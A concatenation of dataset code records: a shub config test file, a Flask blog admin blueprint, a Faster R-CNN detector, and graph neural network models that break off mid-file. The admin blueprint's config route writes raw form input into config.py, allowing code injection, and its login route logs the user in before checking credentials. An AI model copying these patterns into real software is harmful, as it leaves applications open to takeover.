os.path.join(self.tmpdir, '.netrc')\n with open(self.globalpath, 'w') as f:\n f.write(VALID_YAML_CFG)\n with open(self.localpath, 'w') as f:\n f.write(LOCAL_SCRAPINGHUB_YML)\n with open(self.globalscrapycfgpath, 'w') as f:\n f.write(GLOBAL_SCRAPY_CFG)\n with open(self.netrcpath, 'w') as f:\n f.write(NETRC)\n self._old_dir = os.getcwd()\n os.chdir(self.tmpdir)\n\n patcher_gsyp = mock.patch('shub.config.GLOBAL_SCRAPINGHUB_YML_PATH',\n new=self.globalpath)\n patcher_nrcp = mock.patch('shub.config.NETRC_PATH', new=self.netrcpath)\n patcher_gs = mock.patch('shub.config.get_sources',\n return_value=[self.globalscrapycfgpath])\n self.addCleanup(patcher_gsyp.stop)\n self.addCleanup(patcher_nrcp.stop)\n self.addCleanup(patcher_gs.stop)\n patcher_gsyp.start()\n patcher_nrcp.start()\n patcher_gs.start()\n\n def 
tearDown(self):\n os.chdir(self._old_dir)\n shutil.rmtree(self.tmpdir)\n\n def test_scrapinghub_ymls_read(self):\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key')\n self.assertEqual(\n conf.get_endpoint('externalproj'),\n 'local_ext_endpoint',\n )\n self.assertEqual(conf.get_apikey('externalproj'), 'key_ext')\n with self.assertRaises(BadParameterException):\n conf.get_project_id('ext2')\n\n def test_local_scrapinghub_yml_in_parent_dir(self):\n subsubdir = os.path.join(self.tmpdir, 'sub/sub')\n os.makedirs(subsubdir)\n os.chdir(subsubdir)\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('externalproj'), 'key_ext')\n\n def test_no_local_scrapinghub_yml(self):\n os.remove(self.localpath)\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key')\n with self.assertRaises(BadParameterException):\n conf.get_apikey('localextproj')\n\n def test_no_global_scrapinghub_yml(self):\n os.remove(self.globalpath)\n conf = load_shub_config()\n with self.assertRaises(BadParameterException):\n conf.get_apikey('shproj')\n self.assertEqual(conf.get_apikey('localextproj'), 'key_ext')\n\n def test_envvar_precedence(self):\n _old_environ = dict(os.environ)\n os.environ['SHUB_APIKEY'] = 'key_env'\n conf = load_shub_config()\n self.assertEqual(conf.get_apikey('shproj'), 'key_env')\n os.environ.clear()\n os.environ.update(_old_environ)\n\n def test_autocreate_empty_global_scrapinghub_yml(self):\n os.remove(self.globalpath)\n os.remove(self.globalscrapycfgpath)\n os.remove(self.netrcpath)\n load_shub_config()\n self.assertTrue(os.path.isfile(self.globalpath))\n with open(self.globalpath, 'r') as f:\n self.assertEqual(f.read(), \"\")\n\n def test_automigrate_to_global_scrapinghub_yml(self):\n def _check_conf():\n conf = load_shub_config()\n self.assertEqual(\n conf.get_target('123'),\n (123, 'dotsc_endpoint', 'netrc_key'),\n )\n self.assertEqual(conf.projects['ext2'], 'ext2/333')\n self.assertEqual(\n conf.get_target('ext2'),\n (333, 'ext2_endpoint', 'ext2_key'),\n )\n os.remove(self.globalpath)\n _check_conf()\n self.assertTrue(os.path.isfile(self.globalpath))\n os.remove(self.netrcpath)\n os.remove('.scrapy.cfg')\n _check_conf()\n\n def test_automigrate_project_scrapy_cfg(self):\n def _check_conf():\n conf = load_shub_config()\n self.assertEqual(\n conf.get_target('default'),\n (222, 'scrapycfg_endpoint/', 'key'),\n )\n self.assertEqual(\n conf.get_target('ext2'),\n (333, 'ext2_endpoint/', 'ext2_key'),\n )\n self.assertEqual(\n conf.get_target('ext3'),\n (333, 'scrapycfg_endpoint/', 'key'),\n )\n self.assertEqual(\n conf.get_target('ext4'),\n (444, 'scrapycfg_endpoint/', 'ext4_key'),\n )\n self.assertEqual(conf.get_version(), 'ext2_ver')\n scrapycfg = \"\"\"\n [deploy]\n project = 222\n url = scrapycfg_endpoint/scrapyd/\n\n [deploy:ext2]\n url = ext2_endpoint/scrapyd/\n project = 333\n username = ext2_key\n version = ext2_ver\n\n [deploy:ext3]\n project = 333\n\n [deploy:ext4]\n project = 444\n username = ext4_key\n \"\"\"\n with open(self.localscrapycfgpath, 'w') as f:\n f.write(textwrap.dedent(scrapycfg))\n os.mkdir('project')\n os.chdir('project')\n conf = load_shub_config()\n with self.assertRaises(BadParameterException):\n conf.get_target('ext2')\n os.remove(self.localpath)\n # Loaded from scrapy.cfg\n _check_conf()\n # Same config should now be loaded from scrapinghub.yml\n self.assertTrue(os.path.isfile(self.localpath))\n _check_conf()\n\n\nclass ConfigHelpersTest(unittest.TestCase):\n\n def test_update_yaml_dict(self):\n YAML_BEFORE = 
textwrap.dedent(\"\"\"\\\n z_first:\n unrelated: dict\n a_second:\n key1: val1\n # some comment\n key2: val2\n \"\"\")\n YAML_EXPECTED = textwrap.dedent(\"\"\"\\\n z_first:\n unrelated: dict\n a_second:\n key1: newval1\n # some comment\n key2: val2\n key3: val3\n \"\"\")\n runner = CliRunner()\n with runner.isolated_filesystem():\n with open('conf.yml', 'w') as f:\n f.write(YAML_BEFORE)\n with update_yaml_dict('conf.yml') as conf:\n conf['a_second']['key1'] = 'newval1'\n conf['a_second']['key3'] = 'val3'\n with open('conf.yml', 'r') as f:\n self.assertEqual(f.read(), YAML_EXPECTED)\n\n @mock.patch('shub.config.load_shub_config')\n def test_get_target_version(self, mock_lsh):\n get_target('mytarget', auth_required=False)\n get_version()\n mock_lsh.return_value.get_target.assert_called_once_with(\n 'mytarget', auth_required=False)\n mock_lsh.return_value.get_version.assert_called_once_with()\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":17136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"109156110","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom flask import render_template, request, Response, json, redirect, url_for, Blueprint, flash\nfrom flask.ext.login import LoginManager, login_user, logout_user, current_user, login_required\nfrom newlife.model import Article, Label, Category, Comment, Media, Admin\nfrom newlife.config import UPLOAD_FOLDER, ALLOWED_EXTENSIONS\nfrom newlife.view import front\nfrom datetime import date, datetime\nfrom werkzeug import secure_filename\nimport newlife.config as myconfig\nimport math\nimport ast\nimport os\nimport time\n\nblueprint = Blueprint('admin', __name__, template_folder='templates')\n\n\ndef Pagination(dbcollection, pageSize=None, showSize=None, current=None):\n \"\"\"pageSize 每页显示多少个项目,showSize 分页导航中要显示多少个导航数字,\n show0 分页导航中最开始要从那个数字开始计算, pagenum 显示当前分页中有几个项目\"\"\"\n pages = (current - 1) * pageSize\n result = dbcollection.limit(pageSize).skip(pages)\n count = dbcollection.count()\n allpages = math.ceil(count / pageSize)\n # 当所要求显示的导航个数大于总分页数,就把显示导航个数等于总分页数\n if showSize > allpages:\n show0 = 1\n showSize = allpages\n Itemnum = pageSize if (count - (current - 1) * pageSize) > pageSize else (\n count - (current - 1) * pageSize)\n else:\n # middle 为分页时显示分页导航的第一个距离中间显示当前页的相差个数\n middle = math.floor(\n showSize / 2) if showSize % 2 else math.floor(showSize / 2)\n if current - middle <= 0:\n show0 = 1\n elif current - middle > 0 and current + middle <= allpages:\n show0 = current - middle\n elif current + middle > allpages:\n show0 = allpages - middle - 2\n if count < pageSize:\n Itemnum = count\n elif count > pageSize:\n Itemnum = pageSize if (count - (current - 1) * pageSize) > pageSize else (\n count - (current - 1) * pageSize)\n return {\"result\": result,\n \"Itemnum\": Itemnum,\n \"current\": current,\n \"allpages\": allpages,\n \"showNum\": showSize,\n \"show0\": show0\n }\n\n\ndef allowed_file(filename):\n return '.' 
in filename and filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n\n@blueprint.route('/admin')\n@login_required\ndef admin():\n mytime=time.time()\n return render_template('admin/admin.html',time=int(mytime))\n\n\n@blueprint.route('/admin_summary')\n@login_required\ndef summary():\n article = Article()\n monthes = [{'mon':x,'num':0} for x in range(1,13)]\n for month in monthes:\n show=[{'$project': {'month': {'$month': '$time'}}},{'$match': {'month': month['mon']}}]\n result = article.aggregate(show)['result']\n month['num']=len(result)\n # return str(monthes)\n return Response(json.dumps([mon['num'] for mon in monthes]), mimetype='application/json')\n\n\n@blueprint.route('/admin_main.html')\n@login_required\ndef admin_main():\n return render_template('admin/admin_main.html')\n\n\n@blueprint.route('/admin_article_add.html')\n@login_required\ndef admin_article_add():\n label = Label()\n labels = label.get()\n category = Category()\n categorys = category.get()\n return render_template('admin/admin_article_add.html', labels=labels, categorys=categorys)\n\n\n@blueprint.route('/admin_article_view.html')\n@login_required\ndef admin_article_view_direct():\n return admin_article_view(1)\n\n\n@blueprint.route('/admin_article_view.html/')\n@login_required\ndef admin_article_view(page):\n # page 为当前请求的分页\n article = Article()\n artlist = article.get()\n paging = Pagination(artlist, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_article_view.html', paging=paging)\n\n\n@blueprint.route('/admin_label.html')\n@login_required\ndef admin_label():\n label = Label()\n labels = label.get()\n count = labels.count()\n return render_template('admin/admin_label.html', labels=labels, count=count)\n\n\n@blueprint.route('/admin_category.html')\n@login_required\ndef admin_catogory():\n category = Category()\n categorys = category.get()\n count = categorys.count()\n return render_template('admin/admin_category.html', categorys=categorys, count=count)\n\n\n@blueprint.route('/admin_media_add.html')\n@login_required\ndef admin_media_add():\n return render_template('admin/admin_media_add.html')\n\n\n@blueprint.route('/upload', methods=['POST'])\n@login_required\ndef upload():\n if request.method == \"POST\":\n media = Media()\n files = request.files.getlist('files[]')\n try:\n for file in files:\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n # 判断是否已经存在文件\n if not media.ifrepeat(query={'name': filename}):\n upload = os.path.join(os.getcwd() + UPLOAD_FOLDER)\n if not os.path.exists(upload):\n os.makedirs(upload)\n path = os.path.join(\n os.getcwd() + UPLOAD_FOLDER, filename)\n file.save(path)\n filetype = file.mimetype.split('/')[1]\n time = datetime.now()\n media.insert(\n data={'name': filename, 'type': filetype, 'time': time})\n else:\n return \"该文件已存在\"\n else:\n return '文件格式不允许'\n return \"上传成功\"\n except Exception as e:\n return \"上传失败\"\n\n\n@blueprint.route('/remove_media/')\n@login_required\ndef remove_media(id):\n media = Media()\n filename = media.getOne({'id': id})['name']\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = media.remove({'id': id})\n # 从文件系统里删除文件\n try:\n os.remove(os.path.join(os.getcwd() + UPLOAD_FOLDER, filename))\n except Exception as e:\n return \"false\"\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n@blueprint.route('/admin_media_view.html')\n@login_required\ndef admin_media_redirect():\n return admin_media_view(1)\n\n@blueprint.route('/admin_media_view.html/')\n@login_required\ndef 
admin_media_view(page):\n media = Media()\n medias = media.get()\n paging = Pagination(medias, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_media_view.html', paging=paging)\n\n\n@blueprint.route('/admin_comment.html')\n@login_required\ndef admin_comment_redirect():\n return admin_comment(1)\n\n\n@blueprint.route('/admin_comment.html/')\n@login_required\ndef admin_comment(page):\n comment = Comment()\n comments = comment.get()\n paging = Pagination(comments, pageSize=6, showSize=5, current=page)\n return render_template('admin/admin_comment.html', paging=paging)\n\n\n@blueprint.route('/add_article', methods=['GET', 'POST'])\n@login_required\ndef add_article():\n title = request.form.get('title', '')\n content = request.form.get('content', '')\n recom = request.form.get('recommend', '')\n categorys = request.form.get('categorys', '').split(\n \":\") if request.form.get('categorys', '') else \"\"\n labels = request.form.get('labels', '').split(\n \":\") if request.form.get('labels', '') else \"\"\n time = datetime.now()\n article = Article()\n result = article.insert(\n {\"title\": title, \"content\": content, \"category\": categorys, \"label\": labels, \"time\": time, \"recommend\": recom, \"clicknum\": 0})\n if result == \"true\":\n # 更新category 和label的文章数\n category = Category()\n for ca in categorys:\n category.update(query={'name': ca}, inc={\"num\": 1})\n label = Label()\n for la in labels:\n label.update(query={'name': la}, inc={\"num\": 1})\n flash(\"文章添加成功\")\n else:\n flash(\"文章添加失败\")\n return render_template(\"admin/admin_article_add.html\")\n\n\n@blueprint.route('/add_label', methods=['GET', 'POST'])\n@login_required\ndef add_label():\n value = request.form.get('value', '')\n label = Label()\n result = label.insert({'name': value, 'num': 0})\n # return Response(json.dumps(result['n']), mimetype='application/json')\n return result\n\n\n@blueprint.route('/add_category', methods=['GET', 'POST'])\n@login_required\ndef add_category():\n value = request.form.get('value', '')\n category = Category()\n result = category.insert({'name': value, 'num': 0})\n # return Response(json.dumps(result['n']), mimetype='application/json')\n return result\n\n\n@blueprint.route('/remove_comment/', methods=['GET'])\n@login_required\ndef remove_comment(id):\n comment = Comment()\n result = comment.remove(query={'id': id})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_category/', methods=['GET'])\n@login_required\ndef remove_category(id):\n category = Category()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = category.remove({'id': id})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_article/', methods=['GET'])\n@login_required\ndef remove_article(id):\n article = Article()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n get = article.getOne(query={'id': id})\n result = article.remove({'id': id})\n if result['n']:\n # 更新category 和label的文章数\n if get['category']:\n category = Category()\n for ca in get['category']:\n category.update(query={'name': ca}, inc={\"num\": -1})\n if get['label']:\n label = Label()\n for la in get['label']:\n label.update(query={'name': la}, inc={\"num\": -1})\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_label/', methods=['GET'])\n@login_required\ndef remove_label(id):\n label = Label()\n # mognod 返回值为 \"{'ok':1,'n':0}\"字典,其中的n表示数据库操作影响的行数\n result = label.remove({'id': id})\n if result['n']:\n return 
\"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/remove_batch_media', methods=['POST'])\n@blueprint.route('/remove_batch_comment', methods=['POST'])\n@blueprint.route('/remove_batch_label', methods=['POST'])\n@blueprint.route('/remove_batch_category', methods=['POST'])\n@blueprint.route('/remove_batch_article', methods=['POST'])\n@login_required\ndef remove_batch():\n if request.path == \"/remove_batch_article\":\n dofun = remove_article\n elif request.path == \"/remove_batch_category\":\n dofun = remove_category\n elif request.path == \"/remove_batch_label\":\n dofun = remove_label\n elif request.path == \"/remove_batch_comment\":\n dofun = remove_comment\n elif request.path == \"/remove_batch_media\":\n dofun = remove_media\n else:\n pass\n\n ids = request.form.get('ids', '')\n ids = ids.split(\",\")\n result = []\n for id in ids:\n resu = dofun(int(id))\n if resu == \"true\":\n result.append(True)\n else:\n result.append(False)\n if False in result:\n return \"false\"\n else:\n return \"true\"\n\n\n@blueprint.route('/admin_article_modify/')\n@login_required\ndef admin_article_modify(id):\n article = Article()\n result = article.getOne(query={\"id\": id})\n label = Label()\n labels = label.get()\n category = Category()\n categorys = category.get()\n return render_template(\"admin/admin_article_modify.html\", article=result, labels=labels, categorys=categorys)\n\n\n@blueprint.route('/modify_article', methods=['GET', 'POST'])\n@login_required\ndef modify_article():\n article = Article()\n id = int(request.form.get('id', ''))\n content = request.form.get('content', '')\n title = request.form.get('title', '')\n recom = request.form.get('recommend', '')\n categorys = request.form.get('categorys', '').split(\n \":\") if request.form.get('categorys', '') else \"\"\n labels = request.form.get('labels', '').split(\n \":\") if request.form.get('labels', '') else \"\"\n result = article.update(query={\"id\": id}, data={\n \"title\": title, \"content\": content, \"category\": categorys, \"label\": labels, \"recommend\": recom})\n if result['n']:\n return \"文章修改成功\"\n else:\n return \"文章修改失败\"\n\n\n@blueprint.route('/modify_category/', methods=['GET', 'POST'])\n@login_required\ndef modify_category(id):\n value = request.form.get('value', '')\n category = Category()\n result = category.update(query={'id': id}, data={'name': value})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/modify_label/', methods=['GET', 'POST'])\n@login_required\ndef modify_label(id):\n value = request.form.get('value', '')\n label = Label()\n result = label.update(query={'id': id}, data={'name': value})\n if result['n']:\n return \"true\"\n else:\n return \"false\"\n\n\n@blueprint.route('/admin_editor_upload.html')\n@login_required\ndef admin_editor_upload():\n media = Media()\n medias = media.get()\n return render_template('admin/admin_editor_upload.html', medias=medias)\n\n\n@blueprint.route('/login')\ndef login():\n if current_user.is_authenticated():\n return \"你已经登录了\"\n else:\n return render_template(\"admin/login.html\")\n\n\n@blueprint.route('/logincheck', methods=['POST'])\ndef logincheck():\n username = request.form.get('username', '')\n passwd = request.form.get('passwd', '')\n admin = Admin()\n admin.get_user(username, passwd)\n login_user(admin)\n auth = admin.is_authenticated()\n if auth:\n return \"ok\"\n else:\n return \"no\"\n # if result:\n # return \"ok\"\n # else:\n # return \"no\"\n\n\n@blueprint.route(\"/logout\")\n@login_required\ndef logout():\n 
logout_user()\n return redirect(url_for('front.index'))\n\n\n@blueprint.route(\"/admin_config.html\",methods=['GET','POST'])\n@login_required\ndef config():\n if request.method=='GET':\n return render_template(\"admin/admin_config.html\",config=myconfig)\n else:\n try:\n notstr=['CSRF_ENABLED','DBPORT','ALLOWED_EXTENSIONS','MAX_CONTENT_LENGTH']\n file = os.path.join(os.getcwd() + \"/newlife/config.py\")\n filehandle=open(file,'w+',encoding=\"utf-8\")\n for key,value in request.form.items():\n if key not in notstr:\n value=\"'\"+value+\"'\"\n if key=='MAX_CONTENT_LENGTH':\n value = value +'*1024*1024'\n filehandle.write(key+' = '+value+\"\\n\")\n filehandle.close()\n return 'ok'\n except Exception as e:\n return 'no'\n\n\n","sub_path":"newlife/view/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"238274044","text":"import sys\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .caffe_path import caffe\nfrom .timer import Timer\n\n__all__ = ['Detector']\n\n# VOC Class list\nCLASSES = dict(\n voc = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car',\n 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike',\n 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'),\n coco = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train',\n 'truck', 'boat', 'traffic light', 'fire hydrant', 'stop sign',\n 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep',\n 'cow', 'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella',\n 'handbag', 'tie', 'suitcase', 'frisbee', 'skis', 'snowboard',\n 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard',\n 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup', 'fork',\n 'knife', 'spoon', 'bowl', 'banana', 'apple', 'sandwich', 'orange',\n 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair',\n 'couch', 'potted plant', 'bed', 'dining table', 'toilet', 'tv',\n 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',\n 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase',\n 'scissors', 'teddy bear', 'hair drier', 'toothbrush')\n)\n\nclass Detector(object):\n \"\"\"Faster R-CNN Detector\"\"\"\n def __init__(self, prototxt, caffemodel, gpu_id, dataset='coco',\n scale=600, max_size=1000, transpose=(2, 0, 1),\n mean=[102.9801, 115.9465, 122.7717]):\n if gpu_id < 0:\n caffe.set_mode_cpu()\n else:\n caffe.set_mode_gpu()\n caffe.set_device(gpu_id)\n self.net = caffe.Net(prototxt, caffe.TEST, weights=caffemodel)\n print('[{name}] Loaded network {model}'.format(\n name=self.__class__.__name__, model=caffemodel))\n\n self.scale = scale\n self.max_size = max_size\n self.transpose = transpose\n self.mean = np.array(mean, dtype=np.float32)[None,None,:]\n self.classes = CLASSES[dataset]\n\n # colormap for visualization\n self.colormap = []\n for i in range(len(self.classes)):\n self.colormap.append(plt.get_cmap('hsv')(i / len(self.classes)))\n\n def preprocess(self, im):\n im = im.astype(np.float32) - self.mean\n short_size, long_size = sorted(im.shape[:2])\n factor = min(self.scale/short_size, self.max_size/long_size)\n im = cv2.resize(im, None, None, fx=factor, fy=factor)\n im = im.transpose(self.transpose)\n info = np.array((im.shape[1], im.shape[2], factor), dtype=np.float32)\n return im, info, factor\n\n def detect(self, im):\n im, info, factor = self.preprocess(im)\n self.net.blobs['data'].reshape(1, 
*(im.shape))\n self.net.blobs['data'].data[0,...] = im\n self.net.blobs['im_info'].data[...] = info\n dets = self.net.forward()['rcnn_out']\n if dets.ndim != 2:\n return np.empty((0,6), dtype=np.float32)\n else:\n return dets\n\n def demo(self, image):\n im = cv2.imread(image)\n timer = Timer()\n timer.tic()\n dets = self.detect(im)\n timer.toc()\n print ('Detection took {:.3f}s for {:d} objects'.format(timer.total_time, len(dets)))\n return self.plot(im, dets)\n \n def plot(self, im, dets, thresh=0, ax=None, linewidth=2.5):\n # create image axes\n if ax is None:\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n im = im[:, :, (2, 1, 0)] # to rgb\n ax.imshow(im.astype(np.uint8))\n if len(dets) == 0:\n return ax\n\n print(dets.shape)\n for det in dets:\n score = det[1]\n if score < thresh:\n continue\n class_id = int(det[0])\n x, y = det[2:4]\n w, h = det[4:6] - det[2:4]\n rect = plt.Rectangle((x, y), w, h, fill=False, edgecolor=self.colormap[class_id], linewidth=linewidth)\n ax.add_patch(rect)\n ax.text(x, y-2, '{:s} {:.3f}'.format(self.classes[class_id], score),\n bbox=dict(facecolor=self.colormap[class_id], alpha=0.5), fontsize=12, color='white')\n return ax","sub_path":"contrib/faster_rcnn/tutorial/utils/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":4399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"493587926","text":"import torch\nimport torch_geometric\nimport torch.nn.functional as F\nfrom torch import Tensor\nfrom torch.nn import Sequential, Linear, ReLU, GRU, Embedding, BatchNorm1d\nfrom torch_geometric.nn import (\n NNConv,\n Set2Set,\n CGConv,\n global_mean_pool,\n global_add_pool,\n global_max_pool,\n SchNet,\n BatchNorm,\n GraphConv,\n MessagePassing,\n MetaLayer,\n GCNConv,\n)\nfrom torch_geometric.data import DataLoader, Dataset, Data\nfrom torch_geometric.utils import remove_self_loops, dense_to_sparse, degree\nfrom torch_scatter import scatter_mean, scatter_add, scatter_max, scatter\nfrom torch_geometric.nn.models.schnet import InteractionBlock\n\n################################################################################\n# ML Models\n################################################################################\n\n# Models included here:\n# CGCNN, MPNN, SchNet, MEGNet, GCN, Standard NN using SM and SOAP\n\n# Simple GCN\nclass GCN_net(torch.nn.Module):\n def __init__(self, data, dim1, dim2, conv_count, fc_count, pool, **kwargs):\n super(GCN_net, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList(\n [\n GCNConv(dim1, dim1, improved=True, add_self_loops=False)\n for i in range(conv_count)\n ]\n )\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n for layer in self.conv_list:\n out = F.relu(layer(out, data.edge_index, data.edge_weight))\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# MPNN\nclass MPNN(torch.nn.Module):\n def __init__(self, 
data, dim1, dim2, dim3, conv_count, fc_count, pool, **kwargs):\n super(MPNN, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList()\n self.gru_list = torch.nn.ModuleList()\n for i in range(conv_count):\n nn = Sequential(\n Linear(data.num_edge_features, dim3), ReLU(), Linear(dim3, dim1 * dim1)\n )\n conv = NNConv(dim1, dim1, nn, aggr=\"mean\")\n gru = GRU(dim1, dim1)\n self.conv_list.append(conv)\n gru = GRU(dim1, dim1)\n self.gru_list.append(gru)\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n out = F.relu(self.lin0(data.x))\n h = out.unsqueeze(0)\n for i in range(len(self.conv_list)):\n m = F.relu(self.conv_list[i](out, data.edge_index, data.edge_attr))\n out, h = self.gru_list[i](m.unsqueeze(0), h)\n out = out.squeeze(0)\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Schnet\nclass SchNet(SchNet):\n def __init__(\n self, data, dim1, dim2, dim3, conv_count, fc_count, pool, cutoff=8, **kwargs\n ):\n super(SchNet, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n\n self.interactions = torch.nn.ModuleList()\n for _ in range(conv_count):\n block = InteractionBlock(dim1, data.num_edge_features, dim2, cutoff)\n self.interactions.append(block)\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim3)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim3)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim3, dim3) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim3, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n\n for interaction in self.interactions:\n out = out + interaction(\n out, data.edge_index, data.edge_weight, data.edge_attr\n )\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n\n return out.view(-1)\n\n\n# CGCNN\nclass CGCNN(torch.nn.Module):\n def __init__(self, data, dim1, dim2, conv_count, fc_count, pool, **kwargs):\n super(CGCNN, self).__init__()\n\n self.pool = pool\n self.lin0 = torch.nn.Linear(data.num_features, dim1)\n self.conv_list = torch.nn.ModuleList(\n [\n CGConv(dim1, data.num_edge_features, aggr=\"mean\", batch_norm=True)\n for i in range(conv_count)\n ]\n )\n\n if self.pool == \"set2set\":\n self.set2set = Set2Set(dim1, processing_steps=3)\n self.lin1 = torch.nn.Linear(dim1 * 2, dim2)\n else:\n self.lin1 = torch.nn.Linear(dim1, dim2)\n\n self.lin_list = torch.nn.ModuleList(\n [torch.nn.Linear(dim2, dim2) for i in range(fc_count)]\n )\n self.lin2 = torch.nn.Linear(dim2, 1)\n\n def forward(self, data):\n\n out = F.relu(self.lin0(data.x))\n for layer in self.conv_list:\n out = F.relu(layer(out, data.edge_index, data.edge_attr))\n\n if self.pool == \"set2set\":\n out = self.set2set(out, data.batch)\n 
else:\n out = getattr(torch_geometric.nn, self.pool)(out, data.batch)\n\n out = F.relu(self.lin1(out))\n for layer in self.lin_list:\n out = F.relu(layer(out))\n out = self.lin2(out)\n return out.view(-1)\n\n\n# Megnet\nclass Megnet_EdgeModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_EdgeModel, self).__init__()\n self.edge_mlp_1 = Sequential(Linear(dim * 4, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, src, dest, edge_attr, u, batch):\n comb = torch.cat([src, dest, edge_attr, u[batch]], dim=1)\n out = self.edge_mlp_1(comb)\n return out\n\n\nclass Megnet_NodeModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_NodeModel, self).__init__()\n self.node_mlp_1 = Sequential(Linear(dim * 3, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, x, edge_index, edge_attr, u, batch):\n # row, col = edge_index\n v_e = scatter_mean(edge_attr, edge_index[0, :], dim=0)\n comb = torch.cat([x, v_e, u[batch]], dim=1)\n out = self.node_mlp_1(comb)\n return out\n\n\nclass Megnet_GlobalModel(torch.nn.Module):\n def __init__(self, dim):\n super(Megnet_GlobalModel, self).__init__()\n self.global_mlp_1 = Sequential(Linear(dim * 3, dim), ReLU(), Linear(dim, dim))\n\n def forward(self, x, edge_index, edge_attr, u, batch):\n u_e = scatter_mean(edge_attr, edge_index[0, :], dim=0)\n u_e = scatter_mean(u_e, batch, dim=0)\n u_v = scatter_mean(x, batch, dim=0)\n comb = torch.cat([u_e, u_v, u], dim=1)\n out = self.global_mlp_1(comb)\n return out\n\n\nclass MEGNet(torch.nn.Module):\n def __init__(self, data, dim1, dim2, dim3, conv_count, fc_count, pool, **kwargs):\n super(MEGNet, self).__init__()\n self.lin0 = torch.nn.Linear(data.num_node_features, dim1)\n self.pool = pool\n megnet_block = MetaLayer(\n Megnet_EdgeModel(dim2), Megnet_NodeModel(dim2), Megnet_GlobalModel(dim2)\n )\n self.e_embed_list = torch.nn.ModuleList()\n self.x_embed_list = torch.nn.ModuleList()\n self.u_embed_list = torch.nn.ModuleList()\n self.meg_list = 